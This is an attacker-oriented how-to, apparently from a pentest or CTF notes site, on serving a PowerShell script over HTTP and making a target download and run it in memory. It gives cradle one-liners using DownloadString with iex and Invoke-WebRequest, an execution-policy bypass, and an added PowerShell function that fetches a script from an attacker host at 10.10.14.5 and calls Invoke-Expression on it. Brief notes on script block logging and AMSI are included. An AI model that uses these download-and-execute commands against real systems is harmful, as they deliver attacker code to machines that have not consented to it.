Attacker PowerShell File Transfer

This article describes a common technique used by attackers to transfer and execute a PowerShell script from a machine they control (the "attacker") to a target system.

  • The attacker serves a PowerShell (.ps1) file via HTTP from their machine;
  • The target makes an HTTP request to download this file and execute it in memory;

1. Serve the script via HTTP

The command used in the example starts Python's built-in HTTP server on the chosen port. It serves the current working directory, so run it from the directory that contains the .ps1 file. sudo is only needed for privileged ports (below 1024); for a port such as 8000 it can be dropped:

sudo python3 -m http.server <Attacker-PORT01>

The server logs every request to the terminal, which is a quick way to confirm that the target actually reached it.

2. On the target: download and execute in memory

On the target, a one-liner is executed that downloads the contents of the remote file as a string and immediately evaluates it inside the PowerShell process (iex is the alias of Invoke-Expression); nothing is written to disk. As written, the line is meant to be typed into cmd.exe or the Run dialog; from an existing PowerShell prompt, drop the leading "powershell":

powershell iex(New-Object Net.WebClient).DownloadString('http://<Attacker-IP>:<Attacker-PORT01>/<powershell-file>.ps1')

Note that "in memory" does not mean unobserved: if PowerShell script block logging is enabled, the content handed to Invoke-Expression is recorded in event ID 4104, and AMSI-aware antivirus scans it before it runs.

2.1. If you just want to download the file

On the target, execute a line that downloads the remote file and saves it to disk instead of running it. The scheme must match the server from step 1, which speaks plain HTTP, so use http:// rather than https://:

powershell Invoke-WebRequest http://<Attacker-IP>:<Attacker-PORT01>/<powershell-file>.ps1 -OutFile <powershell-file>.ps1

Two caveats: on Windows PowerShell 5.1, Invoke-WebRequest parses responses with Internet Explorer's engine and can fail on hosts where IE has never been launched, which -UseBasicParsing avoids; and a script that has been saved as a .ps1 file is subject to the execution policy when run, unlike the in-memory variant above, so it may need to be launched with "powershell -ExecutionPolicy Bypass -File <powershell-file>.ps1".
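The two target-side variants above, combined into one function as an added example (this is not code from the original article). It fetches the script as raw bytes with the same .NET WebClient class, optionally verifies a SHA-256 hash so the operator notices a truncated or swapped file before it runs, and then either saves the file (step 2.1) or evaluates it in memory (step 2). The function name, its parameters and the server address 10.10.14.5:8000 are assumptions chosen for illustration.

```powershell
# Added example, not from the original article. Placeholder server: 10.10.14.5:8000.
function Get-RemoteScript {
    param(
        [Parameter(Mandatory)][string]$Url,   # http://<Attacker-IP>:<Attacker-PORT01>/<file>.ps1
        [string]$OutFile,                     # if set, save to disk instead of executing
        [string]$ExpectedSha256               # optional hex digest from 'sha256sum <file>.ps1' on the attacker box
    )

    # WebClient has no dependency on the IE engine, unlike Invoke-WebRequest on PowerShell 5.1.
    # DownloadData (bytes) rather than DownloadString so the hash covers the exact file served.
    $client = New-Object System.Net.WebClient
    $bytes  = $client.DownloadData($Url)

    if ($ExpectedSha256) {
        $sha    = [System.Security.Cryptography.SHA256]::Create()
        $actual = ([System.BitConverter]::ToString($sha.ComputeHash($bytes))).Replace('-', '')
        if ($actual -ne $ExpectedSha256.ToUpper()) {
            throw "SHA-256 mismatch for $Url : expected $ExpectedSha256, got $actual"
        }
    }

    if ($OutFile) {
        # Step 2.1: write the file as served. Running it later is subject to the execution policy.
        [System.IO.File]::WriteAllBytes($OutFile, $bytes)
        return $OutFile
    }

    # Step 2: decode and evaluate in this process. A UTF-8 BOM (EF BB BF) is stripped first
    # so it does not end up as a stray character at the start of the script text.
    if ($bytes.Length -ge 3 -and $bytes[0] -eq 0xEF -and $bytes[1] -eq 0xBB -and $bytes[2] -eq 0xBF) {
        $bytes = $bytes[3..($bytes.Length - 1)]
    }
    $script = [System.Text.Encoding]::UTF8.GetString($bytes)
    Invoke-Expression $script
}

# Usage on the target, with the server from step 1 listening on 10.10.14.5:8000:
# Get-RemoteScript -Url 'http://10.10.14.5:8000/run.ps1' -ExpectedSha256 '<hex digest>'
# Get-RemoteScript -Url 'http://10.10.14.5:8000/run.ps1' -OutFile "$env:TEMP\run.ps1"
```

The hash check is optional but cheap: compute it once on the attacker side with sha256sum before starting the server, and a mismatch on the target means the wrong file, a proxy-modified response or a partial download, none of which you want executing blind. The same script block logging and AMSI caveats from step 2 apply to the Invoke-Expression call here.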